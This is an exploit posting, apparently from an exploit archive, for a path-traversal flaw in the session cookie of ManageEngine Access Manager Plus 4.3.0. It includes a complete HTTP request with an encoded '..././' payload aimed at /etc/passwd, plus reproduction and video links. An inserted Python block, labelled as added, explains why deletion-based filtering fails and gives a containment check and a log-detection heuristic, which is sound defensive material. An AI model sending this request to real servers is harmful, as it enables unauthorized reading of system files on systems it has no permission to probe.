## https://sploitus.com/exploit?id=PACKETSTORM:171645
## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal  
## Author: nu11secur1ty  
## Date: 11.22.2023  
## Vendor: https://www.manageengine.com/  
## Software: https://www.manageengine.com/privileged-session-management/download.html  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)  
  
## Description:  
The `pmpcc` cookie is vulnerable to path traversal, enabling read access to arbitrary files on the server.  
The test payload  
`..././..././..././..././..././..././..././..././..././..././etc/passwd`  
was submitted in the `pmpcc` cookie, and the requested file was returned in the application's response.  
An attacker can easily see all the JS structures of the server and can perform very dangerous actions.  
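The `..././` payload above is built to defeat a filter that deletes `../` once: removing the inner `../` from `..././` leaves exactly `../`. The following is an added example (not the advisory's or the vendor's code) that reproduces that filter failure with the advisory's cookie value, then shows a canonicalize-and-contain check and a request-log heuristic that both reject it; the web root and file paths are hypothetical.

```python
"""Added example (not from the advisory): how the ..././ payload defeats a
delete-based '../' filter, plus a canonicalization check and a log heuristic
that catch it. Paths and the web root below are hypothetical."""
import posixpath
from urllib.parse import unquote

# The advisory's cookie value: URL-encoded "..././" ten times, then "etc/passwd".
ADVISORY_COOKIE = "...%2f.%2f" * 10 + "etc%2fpasswd"
WEB_ROOT = "/opt/amp/webapps/static"  # hypothetical directory the cookie should stay under


def fully_decode(value: str) -> str:
    """URL-decode until stable so %252e-style double encoding cannot hide a dot."""
    while (decoded := unquote(value)) != value:
        value = decoded
    return value


def naive_strip(value: str) -> str:
    """Single-pass deletion of '../', the filter style ..././ is built to beat:
    removing the inner '../' from '..././' leaves exactly '../'."""
    return fully_decode(value).replace("../", "")


def naive_resolve(value: str) -> str:
    """Path a filter-then-join handler would open (no containment check)."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, naive_strip(value)))


def resolve_safely(value: str, root: str = WEB_ROOT):
    """Decode, join, canonicalize, then require the result to stay under root.
    Returns the canonical path, or None when it escapes root."""
    candidate = posixpath.normpath(posixpath.join(root, fully_decode(value).lstrip("/")))
    return candidate if posixpath.commonpath([root, candidate]) == root else None


def suspicious_segments(value: str) -> list:
    """Detection heuristic for request logs: a path segment made only of
    two or more dots ('..', '...', ...) never names a legitimate file."""
    return [seg for seg in fully_decode(value).split("/") if len(seg) >= 2 and set(seg) == {"."}]


if __name__ == "__main__":
    print("after naive filter :", naive_strip(ADVISORY_COOKIE))
    print("naive handler opens:", naive_resolve(ADVISORY_COOKIE))
    print("safe resolver      :", resolve_safely(naive_strip(ADVISORY_COOKIE)))
    print("flagged segments   :", suspicious_segments(ADVISORY_COOKIE))
```

Note that the raw cookie value canonicalizes to a harmless path under the root; it is the deletion filter that turns it into `../`, which is why sanitizing by deletion is the wrong fix.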
  
## STATUS: HIGH Vulnerability  
  
[+] Exploits:  
```http
GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1
Host: localhost:9292
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd; _zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a; JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E; JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Mobile: ?0
X-Requested-With: XMLHttpRequest
Sec-CH-UA-Platform: Windows
Referer: https://localhost:9292/AMPHome.html
```
  
[+] Response:  
  
(response body: the application's JS localization string table, truncated by the author)  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))  
  
## Reference:  
[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)  
  
## Proof and Exploit:  
[href](https://streamable.com/scdzsb)  
  
## Time spent  
`03:00:00`